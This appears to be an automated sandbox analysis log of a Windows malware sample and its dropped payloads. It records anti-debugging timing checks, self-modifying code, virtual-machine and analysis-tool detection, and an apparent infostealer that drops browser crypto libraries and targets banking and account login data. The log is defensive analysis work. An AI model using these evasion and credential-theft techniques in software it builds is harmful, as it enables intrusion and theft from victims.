Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DF0679 second address: 4DF06DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4AE04F8896h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, D4D0h 0x0000001a pushfd 0x0000001b jmp 00007F4AE04F8899h 0x00000020 xor cx, 1956h 0x00000025 jmp 00007F4AE04F8891h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE09CB second address: 4DE09E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE09E0 second address: 4DE09E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE09E6 second address: 4DE09EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE09EA second address: 4DE0A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8893h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4AE04F8896h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0A21 second address: 4DE0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0A25 second address: 4DE0A41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8898h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0A41 second address: 4DE0A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4AE0E87EC6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0895 second address: 4DE0899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0899 second address: 4DE08B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE08B6 second address: 4DE08FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F4AE04F888Dh 0x0000000b and ah, 00000076h 0x0000000e jmp 00007F4AE04F8891h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F4AE04F888Eh 0x0000001e pop ebp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov esi, 1C2889F3h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D8004C second address: 4D8005B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D8005B second address: 4D80061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80061 second address: 4D80065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80065 second address: 4D800DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4AE04F8899h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 call 00007F4AE04F888Ch 0x00000018 pop esi 0x00000019 mov ecx, edx 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F4AE04F8899h 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4AE04F8898h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D800DA second address: 4D800E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0BD8 second address: 4DE0C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4AE04F8893h 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DE0C08 second address: 4DE0C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ch, bl 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, C7FDh 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Special instruction interceptor: First address: 1AEBA3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Special instruction interceptor: First address: 1AEB37 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Special instruction interceptor: First address: 388AF0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Special instruction interceptor: First address: 1AEB0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Special instruction interceptor: First address: 3EC748 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 95EBA3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 95EB37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: B38AF0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 95EB0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: B9C748 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

Code function: 0_2_04DE0C04 rdtsc

0_2_04DE0C04

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1354	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 447	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1176	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	API coverage: 6.2 %
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	API coverage: 6.5 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6776	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2632	Thread sleep count: 1354 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2632	Thread sleep time: -2709354s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3928	Thread sleep count: 447 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3928	Thread sleep time: -13410000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804	Thread sleep time: -1260000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2832	Thread sleep count: 1408 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2832	Thread sleep time: -2817408s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6820	Thread sleep count: 1176 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6820	Thread sleep time: -2353176s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe TID: 7104	Thread sleep time: -73720s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe TID: 7044	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00401110
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_004099F0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	10_2_0040A2C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	10_2_004156C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040C2E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00415EA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	10_2_00414F80
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040B390
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00409D40
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	10_2_00415A70
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	10_2_0040AAB0

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

10_2_004153C0

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_0040FDA0 GetSystemInfo,wsprintfA,

10_2_0040FDA0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002518000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware^R
Source: axplong.exe, axplong.exe, 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: HJEBGH.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: HJEBGH.10.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: HJEBGH.10.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: HJEBGH.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000003.2938342842.0000021547812000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949425012.0000021547812000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002518000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002569000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HJEBGH.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: HJEBGH.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: server.exe, 00000009.00000002.2949296578.000002154779C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HJEBGH.10.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: CFHIIJDBKE.exe, 0000000C.00000002.3353662861.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: HJEBGH.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: HJEBGH.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: HJEBGH.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: HJEBGH.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: HJEBGH.10.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: HJEBGH.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002518000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: HJEBGH.10.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: HJEBGH.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: HJEBGH.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: HJEBGH.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: IRqsWvBBMc.exe, 00000000.00000002.2144205662.000000000033F000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2168305762.0000000000AEF000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2170669031.0000000000AEF000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HJEBGH.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: HJEBGH.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

API call chain: ExitProcess graph end node

graph_10-86430

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

Code function: 0_2_04DE0C04 rdtsc

0_2_04DE0C04

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

10_2_0041D12F

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_00402000 VirtualProtect 00000000,00000004,00000100,?

10_2_00402000

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

10_2_00417A40

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0092645B mov eax, dword ptr fs:[00000030h]	7_2_0092645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0092A1C2 mov eax, dword ptr fs:[00000030h]	7_2_0092A1C2
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_004176E0 mov eax, dword ptr fs:[00000030h]	10_2_004176E0

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_00402000 lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenA,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,VirtualProtect,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,

10_2_00402000

Source: C:\ProgramData\CFHIIJDBKE.exe

Process token adjusted: Debug

